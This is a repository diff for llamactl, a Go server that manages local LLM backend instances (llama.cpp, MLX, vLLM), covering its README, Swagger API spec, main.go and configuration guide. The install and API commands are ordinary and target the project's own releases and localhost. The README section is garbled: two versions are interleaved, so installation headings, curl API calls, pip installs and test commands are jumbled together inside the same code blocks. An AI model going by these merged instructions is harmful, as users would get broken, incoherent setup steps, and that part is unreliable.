LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-linux-amd64.tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# Build the web UI
npm run build
# Return to project root and build
cd ..
go build -o llamactl ./cmd/server
# Run the server
./llamactl
```
## Configuration
llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
1. Hardcoded defaults
2. Configuration file
3. Environment variables
### Configuration Files
Configuration files are searched in the following locations:
**Linux/macOS:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `~/.config/llamactl/config.yaml`
- `/etc/llamactl/config.yaml`
**Windows:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `%APPDATA%\llamactl\config.yaml`
- `%PROGRAMDATA%\llamactl\config.yaml`
You can specify the path to the config file with the `LLAMACTL_CONFIG_PATH` environment variable.
## API Key Authentication
llamactl now supports API Key authentication for both management and inference (OpenAI-compatible) endpoints. There are separate keys for management and inference APIs. Management keys grant full access; inference keys grant access only to the OpenAI-compatible endpoints.
**How to Use:**
- Pass your API key in requests using one of:
- `Authorization: Bearer <key>` header
- `X-API-Key: <key>` header
- `api_key=<key>` query parameter
**Auto-generated keys**: If no keys are set and authentication is required, a key will be generated and printed to the terminal at startup. For production, set your own keys in config or environment variables.
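A minimal sketch of the three equivalent ways to pass a key on a management request (the key value below is a placeholder):

```bash
# Authorization header (Bearer)
curl -H "Authorization: Bearer sk-management-xyz456" http://localhost:8080/api/v1/instances

# X-API-Key header
curl -H "X-API-Key: sk-management-xyz456" http://localhost:8080/api/v1/instances

# Query parameter
curl "http://localhost:8080/api/v1/instances?api_key=sk-management-xyz456"
```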
### Configuration Options
#### Server Configuration
```yaml
server:
  host: "0.0.0.0" # Server host to bind to (default: "0.0.0.0")
  port: 8080 # Server port to bind to (default: 8080)
  allowed_origins: ["*"] # CORS allowed origins (default: ["*"])
  enable_swagger: false # Enable Swagger UI (default: false)
```
**Environment Variables:**
- `LLAMACTL_HOST` - Server host
- `LLAMACTL_PORT` - Server port
- `LLAMACTL_ALLOWED_ORIGINS` - Comma-separated CORS origins
- `LLAMACTL_ENABLE_SWAGGER` - Enable Swagger UI (true/false)
#### Instance Configuration
```yaml
instances:
  port_range: [8000, 9000] # Port range for instances
  log_directory: "/tmp/llamactl" # Directory for instance logs
  max_instances: -1 # Maximum instances (-1 = unlimited)
  llama_executable: "llama-server" # Path to llama-server executable
  default_auto_restart: true # Default auto-restart setting
  default_max_restarts: 3 # Default maximum restart attempts
  default_restart_delay: 5 # Default restart delay in seconds
```
**Environment Variables:**
- `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
- `LLAMACTL_LOG_DIR` - Log directory path
- `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
- `LLAMACTL_LLAMA_EXECUTABLE` - Path to llama-server executable
- `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
- `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
- `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds
#### Auth Configuration
```yaml
auth:
  require_inference_auth: true # Require API key for OpenAI endpoints (default: true)
  inference_keys: [] # List of valid inference API keys
  require_management_auth: true # Require API key for management endpoints (default: true)
  management_keys: [] # List of valid management API keys
```
**Environment Variables:**
- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)
- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
### Example Configuration
```yaml
server:
  host: "0.0.0.0"
  port: 8080
instances:
  port_range: [8001, 8100]
  log_directory: "/var/log/llamactl"
  max_instances: 10
  llama_executable: "/usr/local/bin/llama-server"
  default_auto_restart: true
  default_max_restarts: 5
  default_restart_delay: 10
auth:
  require_inference_auth: true
  inference_keys: ["sk-inference-abc123"]
  require_management_auth: true
  management_keys: ["sk-management-xyz456"]
# 3. Start the server
llamactl
# Access dashboard at http://localhost:8080
```
## Usage
### Starting the Server
### Create and manage instances via web dashboard:
1. Open http://localhost:8080
2. Click "Create Instance"
3. Choose backend type (llama.cpp, MLX, or vLLM)
4. Set model path and backend-specific options
5. Configure environment variables if needed (optional)
6. Start or stop the instance
### Or use the REST API:
```bash
# Start with default configuration
./llamactl
# Create llama.cpp instance
curl -X POST localhost:8080/api/v1/instances/my-7b-model \
  -H "Authorization: Bearer your-key" \
  -d '{"backend_type": "llama_cpp", "backend_options": {"model": "/path/to/model.gguf", "gpu_layers": 32}}'
# Start with custom config file
LLAMACTL_CONFIG_PATH=/path/to/config.yaml ./llamactl
# Create MLX instance (macOS)
curl -X POST localhost:8080/api/v1/instances/my-mlx-model \
  -H "Authorization: Bearer your-key" \
  -d '{"backend_type": "mlx_lm", "backend_options": {"model": "mlx-community/Mistral-7B-Instruct-v0.3-4bit"}}'
# Start with environment variables
LLAMACTL_PORT=9090 LLAMACTL_LOG_DIR=/custom/logs ./llamactl
# Create vLLM instance with environment variables
curl -X POST localhost:8080/api/v1/instances/my-vllm-model \
  -H "Authorization: Bearer your-key" \
  -d '{"backend_type": "vllm", "backend_options": {"model": "microsoft/DialoGPT-medium", "tensor_parallel_size": 2}, "environment": {"CUDA_VISIBLE_DEVICES": "0,1", "NCCL_DEBUG": "INFO"}}'
# Use with OpenAI SDK
curl -X POST localhost:8080/v1/chat/completions \
  -H "Authorization: Bearer your-key" \
  -d '{"model": "my-7b-model", "messages": [{"role": "user", "content": "Hello!"}]}'
```
### Web Dashboard
## Installation
Open your browser and navigate to `http://localhost:8080` to access the web dashboard.
### API Usage
The REST API is available at `http://localhost:8080/api/v1`. See the Swagger documentation at `http://localhost:8080/swagger/` for complete API reference.
#### Create an Instance
### Option 1: Download Binary (Recommended)
```bash
curl -X POST http://localhost:8080/api/v1/instances/my-instance \
  -H "Content-Type: application/json" \
  -d '{
    "model": "/path/to/model.gguf",
    "gpu_layers": 32,
    "auto_restart": true
  }'
# Linux/macOS - Get latest version and download
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# Or download manually from the releases page:
# https://github.com/lordmathis/llamactl/releases/latest
# Windows - Download from releases page
```
#### List Instances
### Option 2: Build from Source
Requires Go 1.24+ and Node.js 22+
```bash
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
cd webui && npm ci && npm run build && cd ..
go build -o llamactl ./cmd/server
```
## Prerequisites
### Backend Dependencies
**For llama.cpp backend:**
You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
```bash
curl http://localhost:8080/api/v1/instances
# Homebrew (macOS)
brew install llama.cpp
# Or build from source - see llama.cpp docs
# Or use Docker - no local installation required
```
#### Start/Stop Instance
**For MLX backend (macOS only):**
You need MLX-LM installed:
```bash
# Start
curl -X POST http://localhost:8080/api/v1/instances/my-instance/start
# Install via pip (requires Python 3.8+)
pip install mlx-lm
# Stop
curl -X POST http://localhost:8080/api/v1/instances/my-instance/stop
# Or in a virtual environment (recommended)
python -m venv mlx-env
source mlx-env/bin/activate
pip install mlx-lm
```
### OpenAI Compatible Endpoints
Route requests to instances by including the instance name as the model parameter:
**For vLLM backend:**
You need vLLM installed:
```bash
curl -X POST http://localhost:8080/v1/chat/completions \
  -H "Content-Type: application/json" \
  -d '{
    "model": "my-instance",
    "messages": [{"role": "user", "content": "Hello!"}]
  }'
# Install via pip (requires Python 3.8+, GPU required)
pip install vllm
# Or in a virtual environment (recommended)
python -m venv vllm-env
source vllm-env/bin/activate
pip install vllm
# Or use Docker - no local installation required
```
## Development
## Docker Support
### Running Tests
llamactl supports running backends in Docker containers - perfect for production deployments without local backend installation. Simply enable Docker in your configuration:
```bash
# Go tests
go test ./...
# Web UI tests
cd webui
npm test
```yaml
backends:
  llama-cpp:
    docker:
      enabled: true
  vllm:
    docker:
      enabled: true
```
### Development Server
**Requirements:** Docker installed and running. For GPU support: nvidia-docker2 (Linux) or Docker Desktop with GPU support.
```bash
# Start Go server in development mode
go run ./cmd/server
For detailed Docker configuration options, see the [Configuration Guide](docs/getting-started/configuration.md).
# Start web UI development server (in another terminal)
cd webui
npm run dev
## Configuration
llamactl works out of the box with sensible defaults.
```yaml
server:
  host: "0.0.0.0" # Server host to bind to
  port: 8080 # Server port to bind to
  allowed_origins: ["*"] # Allowed CORS origins (default: all)
  enable_swagger: false # Enable Swagger UI for API docs

backends:
  llama-cpp:
    command: "llama-server"
    args: []
    environment: {} # Environment variables for the backend process
    docker:
      enabled: false
      image: "ghcr.io/ggml-org/llama.cpp:server"
      args: ["run", "--rm", "--network", "host", "--gpus", "all"]
      environment: {} # Environment variables for the container
  vllm:
    command: "vllm"
    args: ["serve"]
    environment: {} # Environment variables for the backend process
    docker:
      enabled: false
      image: "vllm/vllm-openai:latest"
      args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
      environment: {} # Environment variables for the container
  mlx:
    command: "mlx_lm.server"
    args: []
    environment: {} # Environment variables for the backend process

instances:
  port_range: [8000, 9000] # Port range for instances
  data_dir: ~/.local/share/llamactl # Data directory (platform-specific, see below)
  configs_dir: ~/.local/share/llamactl/instances # Instance configs directory
  logs_dir: ~/.local/share/llamactl/logs # Logs directory
  auto_create_dirs: true # Auto-create data/config/logs dirs if missing
  max_instances: -1 # Max instances (-1 = unlimited)
  max_running_instances: -1 # Max running instances (-1 = unlimited)
  enable_lru_eviction: true # Enable LRU eviction for idle instances
  default_auto_restart: true # Auto-restart new instances by default
  default_max_restarts: 3 # Max restarts for new instances
  default_restart_delay: 5 # Restart delay (seconds) for new instances
  default_on_demand_start: true # Default on-demand start setting
  on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
  timeout_check_interval: 5 # Idle instance timeout check in minutes

auth:
  require_inference_auth: true # Require auth for inference endpoints
  inference_keys: [] # Keys for inference endpoints
  require_management_auth: true # Require auth for management endpoints
  management_keys: [] # Keys for management endpoints
```
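Any of these defaults can also be overridden at startup with `LLAMACTL_*` environment variables (see the Configuration Guide for the full list). A minimal sketch with illustrative values:

```bash
# Override the server port and instance limit without editing a config file
LLAMACTL_PORT=9090 LLAMACTL_MAX_INSTANCES=5 llamactl
```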
## API Documentation
Interactive API documentation is available at `http://localhost:8080/swagger/` when the server is running.
For detailed configuration options including environment variables, file locations, and advanced settings, see the [Configuration Guide](docs/getting-started/configuration.md).
## License
This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.
MIT License - see [LICENSE](LICENSE) file.

File diff suppressed because it is too large

File diff suppressed because it is too large


@@ -1,362 +1,60 @@
basePath: /api/v1
definitions:
llamactl.CreateInstanceOptions:
backends.BackendType:
enum:
- llama_cpp
- mlx_lm
- vllm
type: string
x-enum-varnames:
- BackendTypeLlamaCpp
- BackendTypeMlxLm
- BackendTypeVllm
instance.CreateInstanceOptions:
properties:
alias:
type: string
api_key:
type: string
api_key_file:
type: string
auto_restart:
description: Auto restart
type: boolean
batch_size:
type: integer
cache_reuse:
type: integer
cache_type_k:
type: string
cache_type_k_draft:
type: string
cache_type_v:
type: string
cache_type_v_draft:
type: string
chat_template:
type: string
chat_template_file:
type: string
chat_template_kwargs:
type: string
check_tensors:
type: boolean
cont_batching:
type: boolean
control_vector:
items:
type: string
type: array
control_vector_layer_range:
type: string
control_vector_scaled:
items:
type: string
type: array
cpu_mask:
type: string
cpu_mask_batch:
type: string
cpu_range:
type: string
cpu_range_batch:
type: string
cpu_strict:
type: integer
cpu_strict_batch:
type: integer
ctx_size:
type: integer
ctx_size_draft:
type: integer
defrag_thold:
type: number
device:
type: string
device_draft:
type: string
draft_max:
description: Speculative decoding params
type: integer
draft_min:
type: integer
draft_p_min:
type: number
dry_allowed_length:
type: integer
dry_base:
type: number
dry_multiplier:
type: number
dry_penalty_last_n:
type: integer
dry_sequence_breaker:
items:
type: string
type: array
dump_kv_cache:
type: boolean
dynatemp_exp:
type: number
dynatemp_range:
type: number
embd_bge_small_en_default:
description: Default model params
type: boolean
embd_e5_small_en_default:
type: boolean
embd_gte_small_default:
type: boolean
embedding:
type: boolean
escape:
type: boolean
fim_qwen_1_5b_default:
type: boolean
fim_qwen_3b_default:
type: boolean
fim_qwen_7b_default:
type: boolean
fim_qwen_7b_spec:
type: boolean
fim_qwen_14b_spec:
type: boolean
flash_attn:
type: boolean
frequency_penalty:
type: number
gpu_layers:
type: integer
gpu_layers_draft:
type: integer
grammar:
type: string
grammar_file:
type: string
hf_file:
type: string
hf_file_v:
type: string
hf_repo:
type: string
hf_repo_draft:
type: string
hf_repo_v:
type: string
hf_token:
type: string
host:
type: string
ignore_eos:
type: boolean
jinja:
type: boolean
json_schema:
type: string
json_schema_file:
type: string
keep:
type: integer
log_colors:
type: boolean
log_disable:
type: boolean
log_file:
type: string
log_prefix:
type: boolean
log_timestamps:
type: boolean
logit_bias:
items:
type: string
type: array
lora:
items:
type: string
type: array
lora_init_without_apply:
type: boolean
lora_scaled:
items:
type: string
type: array
main_gpu:
backend_options:
additionalProperties: {}
type: object
backend_type:
$ref: '#/definitions/backends.BackendType'
idle_timeout:
description: Idle timeout
type: integer
max_restarts:
type: integer
metrics:
on_demand_start:
description: On demand start
type: boolean
min_p:
type: number
mirostat:
type: integer
mirostat_ent:
type: number
mirostat_lr:
type: number
mlock:
type: boolean
mmproj:
type: string
mmproj_url:
type: string
model:
type: string
model_draft:
type: string
model_url:
type: string
model_vocoder:
description: Audio/TTS params
type: string
no_cont_batching:
type: boolean
no_context_shift:
description: Server/Example-specific params
type: boolean
no_escape:
type: boolean
no_kv_offload:
type: boolean
no_mmap:
type: boolean
no_mmproj:
type: boolean
no_mmproj_offload:
type: boolean
no_perf:
type: boolean
no_prefill_assistant:
type: boolean
no_slots:
type: boolean
no_warmup:
type: boolean
no_webui:
type: boolean
numa:
type: string
override_kv:
items:
type: string
type: array
override_tensor:
items:
type: string
type: array
parallel:
type: integer
path:
type: string
poll:
type: integer
poll_batch:
type: integer
pooling:
type: string
port:
type: integer
predict:
type: integer
presence_penalty:
type: number
priority:
type: integer
priority_batch:
type: integer
props:
type: boolean
reasoning_budget:
type: integer
reasoning_format:
type: string
repeat_last_n:
type: integer
repeat_penalty:
type: number
reranking:
type: boolean
restart_delay_seconds:
description: RestartDelay duration in seconds
type: integer
rope_freq_base:
type: number
rope_freq_scale:
type: number
rope_scale:
type: number
rope_scaling:
type: string
samplers:
description: Sampling params
type: string
sampling_seq:
type: string
seed:
type: integer
slot_prompt_similarity:
type: number
slot_save_path:
type: string
slots:
type: boolean
special:
type: boolean
split_mode:
type: string
spm_infill:
type: boolean
ssl_cert_file:
type: string
ssl_key_file:
type: string
temperature:
type: number
tensor_split:
type: string
threads:
type: integer
threads_batch:
type: integer
threads_http:
type: integer
timeout:
type: integer
top_k:
type: integer
top_p:
type: number
tts_use_guide_tokens:
type: boolean
typical:
type: number
ubatch_size:
type: integer
verbose:
type: boolean
verbose_prompt:
description: Common params
type: boolean
verbosity:
type: integer
xtc_probability:
type: number
xtc_threshold:
type: number
yarn_attn_factor:
type: number
yarn_beta_fast:
type: number
yarn_beta_slow:
type: number
yarn_ext_factor:
type: number
yarn_orig_ctx:
restart_delay:
description: seconds
type: integer
type: object
llamactl.Instance:
instance.InstanceStatus:
enum:
- 0
- 1
- 2
type: integer
x-enum-varnames:
- Stopped
- Running
- Failed
instance.Process:
properties:
created:
description: Creation time
type: integer
name:
type: string
running:
status:
allOf:
- $ref: '#/definitions/instance.InstanceStatus'
description: Status
type: boolean
type: object
llamactl.OpenAIInstance:
server.OpenAIInstance:
properties:
created:
type: integer
@@ -367,15 +65,20 @@ definitions:
owned_by:
type: string
type: object
llamactl.OpenAIListInstancesResponse:
server.OpenAIListInstancesResponse:
properties:
data:
items:
$ref: '#/definitions/llamactl.OpenAIInstance'
$ref: '#/definitions/server.OpenAIInstance'
type: array
object:
type: string
type: object
server.ParseCommandRequest:
properties:
command:
type: string
type: object
info:
contact: {}
description: llamactl is a control server for managing Llama Server instances.
@@ -385,6 +88,153 @@ info:
title: llamactl API
version: "1.0"
paths:
/backends/llama-cpp/devices:
get:
description: Returns a list of available devices for the llama server
responses:
"200":
description: List of devices
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: List available devices for llama server
tags:
- backends
/backends/llama-cpp/help:
get:
description: Returns the help text for the llama server command
responses:
"200":
description: Help text
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get help for llama server
tags:
- backends
/backends/llama-cpp/parse-command:
post:
consumes:
- application/json
description: Parses a llama-server command string into instance options
parameters:
- description: Command to parse
in: body
name: request
required: true
schema:
$ref: '#/definitions/server.ParseCommandRequest'
produces:
- application/json
responses:
"200":
description: Parsed options
schema:
$ref: '#/definitions/instance.CreateInstanceOptions'
"400":
description: Invalid request or command
schema:
additionalProperties:
type: string
type: object
"500":
description: Internal Server Error
schema:
additionalProperties:
type: string
type: object
security:
- ApiKeyAuth: []
summary: Parse llama-server command
tags:
- backends
/backends/llama-cpp/version:
get:
description: Returns the version of the llama server command
responses:
"200":
description: Version information
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get version of llama server
tags:
- backends
/backends/mlx/parse-command:
post:
consumes:
- application/json
description: Parses MLX-LM server command string into instance options
parameters:
- description: Command to parse
in: body
name: request
required: true
schema:
$ref: '#/definitions/server.ParseCommandRequest'
produces:
- application/json
responses:
"200":
description: Parsed options
schema:
$ref: '#/definitions/instance.CreateInstanceOptions'
"400":
description: Invalid request or command
schema:
additionalProperties:
type: string
type: object
security:
- ApiKeyAuth: []
summary: Parse mlx_lm.server command
tags:
- backends
/backends/vllm/parse-command:
post:
consumes:
- application/json
description: Parses a vLLM serve command string into instance options
parameters:
- description: Command to parse
in: body
name: request
required: true
schema:
$ref: '#/definitions/server.ParseCommandRequest'
produces:
- application/json
responses:
"200":
description: Parsed options
schema:
$ref: '#/definitions/instance.CreateInstanceOptions'
"400":
description: Invalid request or command
schema:
additionalProperties:
type: string
type: object
security:
- ApiKeyAuth: []
summary: Parse vllm serve command
tags:
- backends
/instances:
get:
description: Returns a list of all instances managed by the server
@@ -393,7 +243,7 @@ paths:
description: List of instances
schema:
items:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
type: array
"500":
description: Internal Server Error
@@ -441,7 +291,7 @@ paths:
"200":
description: Instance details
schema:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
"400":
description: Invalid name format
schema:
@@ -470,12 +320,12 @@ paths:
name: options
required: true
schema:
$ref: '#/definitions/llamactl.CreateInstanceOptions'
$ref: '#/definitions/instance.CreateInstanceOptions'
responses:
"201":
description: Created instance details
schema:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
"400":
description: Invalid request body
schema:
@@ -504,12 +354,12 @@ paths:
name: options
required: true
schema:
$ref: '#/definitions/llamactl.CreateInstanceOptions'
$ref: '#/definitions/instance.CreateInstanceOptions'
responses:
"200":
description: Updated instance details
schema:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
"400":
description: Invalid name format
schema:
@@ -627,7 +477,7 @@ paths:
"200":
description: Restarted instance details
schema:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
"400":
description: Invalid name format
schema:
@@ -654,7 +504,7 @@ paths:
"200":
description: Started instance details
schema:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
"400":
description: Invalid name format
schema:
@@ -681,7 +531,7 @@ paths:
"200":
description: Stopped instance details
schema:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
"400":
description: Invalid name format
schema:
@@ -695,57 +545,6 @@ paths:
summary: Stop a running instance
tags:
- instances
/server/devices:
get:
description: Returns a list of available devices for the llama server
responses:
"200":
description: List of devices
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: List available devices for llama server
tags:
- server
/server/help:
get:
description: Returns the help text for the llama server command
responses:
"200":
description: Help text
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get help for llama server
tags:
- server
/server/version:
get:
description: Returns the version of the llama server command
responses:
"200":
description: Version information
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get version of llama server
tags:
- server
/v1/:
post:
consumes:
@@ -757,7 +556,7 @@ paths:
"200":
description: OpenAI response
"400":
description: Invalid request body or model name
description: Invalid request body or instance name
schema:
type: string
"500":
@@ -777,7 +576,7 @@ paths:
"200":
description: List of OpenAI-compatible instances
schema:
$ref: '#/definitions/llamactl.OpenAIListInstancesResponse'
$ref: '#/definitions/server.OpenAIListInstancesResponse'
"500":
description: Internal Server Error
schema:
@@ -787,4 +586,21 @@ paths:
summary: List instances in OpenAI-compatible format
tags:
- openai
/version:
get:
description: Returns the version of the llamactl command
responses:
"200":
description: Version information
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get llamactl version
tags:
- version
swagger: "2.0"


@@ -2,11 +2,20 @@ package main
import (
"fmt"
llamactl "llamactl/pkg"
"llamactl/pkg/config"
"llamactl/pkg/manager"
"llamactl/pkg/server"
"net/http"
"os"
"os/signal"
"syscall"
)
// version is set at build time using -ldflags "-X main.version=1.0.0"
var version string = "unknown"
var commitHash string = "unknown"
var buildTime string = "unknown"
// @title llamactl API
// @version 1.0
// @description llamactl is a control server for managing Llama Server instances.
@@ -15,29 +24,76 @@ import (
// @basePath /api/v1
func main() {
config, err := llamactl.LoadConfig("")
// --version flag to print the version
if len(os.Args) > 1 && os.Args[1] == "--version" {
fmt.Printf("llamactl version: %s\n", version)
fmt.Printf("Commit hash: %s\n", commitHash)
fmt.Printf("Build time: %s\n", buildTime)
return
}
configPath := os.Getenv("LLAMACTL_CONFIG_PATH")
cfg, err := config.LoadConfig(configPath)
if err != nil {
fmt.Printf("Error loading config: %v\n", err)
fmt.Println("Using default configuration.")
}
// Create the log directory if it doesn't exist
err = os.MkdirAll(config.Instances.LogDirectory, 0755)
if err != nil {
fmt.Printf("Error creating log directory: %v\n", err)
return
// Set version information
cfg.Version = version
cfg.CommitHash = commitHash
cfg.BuildTime = buildTime
// Create the data directory if it doesn't exist
if cfg.Instances.AutoCreateDirs {
if err := os.MkdirAll(cfg.Instances.InstancesDir, 0755); err != nil {
fmt.Printf("Error creating config directory %s: %v\n", cfg.Instances.InstancesDir, err)
fmt.Println("Persistence will not be available.")
}
if err := os.MkdirAll(cfg.Instances.LogsDir, 0755); err != nil {
fmt.Printf("Error creating log directory %s: %v\n", cfg.Instances.LogsDir, err)
fmt.Println("Instance logs will not be available.")
}
}
// Initialize the instance manager
instanceManager := llamactl.NewInstanceManager(config.Instances)
instanceManager := manager.NewInstanceManager(cfg.Backends, cfg.Instances)
// Create a new handler with the instance manager
handler := llamactl.NewHandler(instanceManager, config)
handler := server.NewHandler(instanceManager, cfg)
// Setup the router with the handler
r := llamactl.SetupRouter(handler)
r := server.SetupRouter(handler)
// Start the server with the router
fmt.Printf("Starting llamactl on port %d...\n", config.Server.Port)
http.ListenAndServe(fmt.Sprintf("%s:%d", config.Server.Host, config.Server.Port), r)
// Handle graceful shutdown
stop := make(chan os.Signal, 1)
signal.Notify(stop, os.Interrupt, syscall.SIGTERM)
server := http.Server{
Addr: fmt.Sprintf("%s:%d", cfg.Server.Host, cfg.Server.Port),
Handler: r,
}
go func() {
fmt.Printf("Llamactl server listening on %s:%d\n", cfg.Server.Host, cfg.Server.Port)
if err := server.ListenAndServe(); err != nil && err != http.ErrServerClosed {
fmt.Printf("Error starting server: %v\n", err)
}
}()
// Wait for shutdown signal
<-stop
fmt.Println("Shutting down server...")
if err := server.Close(); err != nil {
fmt.Printf("Error shutting down server: %v\n", err)
} else {
fmt.Println("Server shut down gracefully.")
}
// Wait for all instances to stop
instanceManager.Shutdown()
fmt.Println("Exiting llamactl.")
}

docs-requirements.txt (new file, 5 lines added)

@@ -0,0 +1,5 @@
mkdocs-material==9.5.3
mkdocs==1.5.3
pymdown-extensions==10.7
mkdocs-git-revision-date-localized-plugin==1.2.4
mike==2.0.0


@@ -0,0 +1,238 @@
# Configuration
llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
```
Defaults < Configuration file < Environment variables
```
llamactl works out of the box with sensible defaults, but you can customize the behavior to suit your needs.
## Default Configuration
Here's the default configuration with all available options:
```yaml
server:
host: "0.0.0.0" # Server host to bind to
port: 8080 # Server port to bind to
allowed_origins: ["*"] # Allowed CORS origins (default: all)
enable_swagger: false # Enable Swagger UI for API docs
backends:
llama-cpp:
command: "llama-server"
args: []
environment: {} # Environment variables for the backend process
docker:
enabled: false
image: "ghcr.io/ggml-org/llama.cpp:server"
args: ["run", "--rm", "--network", "host", "--gpus", "all"]
environment: {}
vllm:
command: "vllm"
args: ["serve"]
environment: {} # Environment variables for the backend process
docker:
enabled: false
image: "vllm/vllm-openai:latest"
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
environment: {}
mlx:
command: "mlx_lm.server"
args: []
environment: {} # Environment variables for the backend process
instances:
port_range: [8000, 9000] # Port range for instances
data_dir: ~/.local/share/llamactl # Data directory (platform-specific, see below)
configs_dir: ~/.local/share/llamactl/instances # Instance configs directory
logs_dir: ~/.local/share/llamactl/logs # Logs directory
auto_create_dirs: true # Auto-create data/config/logs dirs if missing
max_instances: -1 # Max instances (-1 = unlimited)
max_running_instances: -1 # Max running instances (-1 = unlimited)
enable_lru_eviction: true # Enable LRU eviction for idle instances
default_auto_restart: true # Auto-restart new instances by default
default_max_restarts: 3 # Max restarts for new instances
default_restart_delay: 5 # Restart delay (seconds) for new instances
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Idle instance timeout check in minutes
auth:
require_inference_auth: true # Require auth for inference endpoints
inference_keys: [] # Keys for inference endpoints
require_management_auth: true # Require auth for management endpoints
management_keys: [] # Keys for management endpoints
```
## Configuration Files
### Configuration File Locations
Configuration files are searched in the following locations (in order of precedence):
**Linux:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `$HOME/.config/llamactl/config.yaml`
- `/etc/llamactl/config.yaml`
**macOS:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `$HOME/Library/Application Support/llamactl/config.yaml`
- `/Library/Application Support/llamactl/config.yaml`
**Windows:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `%APPDATA%\llamactl\config.yaml`
- `%USERPROFILE%\llamactl\config.yaml`
- `%PROGRAMDATA%\llamactl\config.yaml`
You can specify the path to the config file with the `LLAMACTL_CONFIG_PATH` environment variable.
## Configuration Options
### Server Configuration
```yaml
server:
host: "0.0.0.0" # Server host to bind to (default: "0.0.0.0")
port: 8080 # Server port to bind to (default: 8080)
allowed_origins: ["*"] # CORS allowed origins (default: ["*"])
enable_swagger: false # Enable Swagger UI (default: false)
```
**Environment Variables:**
- `LLAMACTL_HOST` - Server host
- `LLAMACTL_PORT` - Server port
- `LLAMACTL_ALLOWED_ORIGINS` - Comma-separated CORS origins
- `LLAMACTL_ENABLE_SWAGGER` - Enable Swagger UI (true/false)
### Backend Configuration
```yaml
backends:
llama-cpp:
command: "llama-server"
args: []
environment: {} # Environment variables for the backend process
docker:
enabled: false # Enable Docker runtime (default: false)
image: "ghcr.io/ggml-org/llama.cpp:server"
args: ["run", "--rm", "--network", "host", "--gpus", "all"]
environment: {}
vllm:
command: "vllm"
args: ["serve"]
environment: {} # Environment variables for the backend process
docker:
enabled: false
image: "vllm/vllm-openai:latest"
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
environment: {}
mlx:
command: "mlx_lm.server"
args: []
environment: {} # Environment variables for the backend process
# MLX does not support Docker
```
**Backend Configuration Fields:**
- `command`: Executable name/path for the backend
- `args`: Default arguments prepended to all instances
- `environment`: Environment variables for the backend process (optional)
- `docker`: Docker-specific configuration (optional)
- `enabled`: Boolean flag to enable Docker runtime
- `image`: Docker image to use
- `args`: Additional arguments passed to `docker run`
- `environment`: Environment variables for the container (optional)
**Environment Variables:**
**LlamaCpp Backend:**
- `LLAMACTL_LLAMACPP_COMMAND` - LlamaCpp executable command
- `LLAMACTL_LLAMACPP_ARGS` - Space-separated default arguments
- `LLAMACTL_LLAMACPP_ENV` - Environment variables in format "KEY1=value1,KEY2=value2"
- `LLAMACTL_LLAMACPP_DOCKER_ENABLED` - Enable Docker runtime (true/false)
- `LLAMACTL_LLAMACPP_DOCKER_IMAGE` - Docker image to use
- `LLAMACTL_LLAMACPP_DOCKER_ARGS` - Space-separated Docker arguments
- `LLAMACTL_LLAMACPP_DOCKER_ENV` - Docker environment variables in format "KEY1=value1,KEY2=value2"
**VLLM Backend:**
- `LLAMACTL_VLLM_COMMAND` - VLLM executable command
- `LLAMACTL_VLLM_ARGS` - Space-separated default arguments
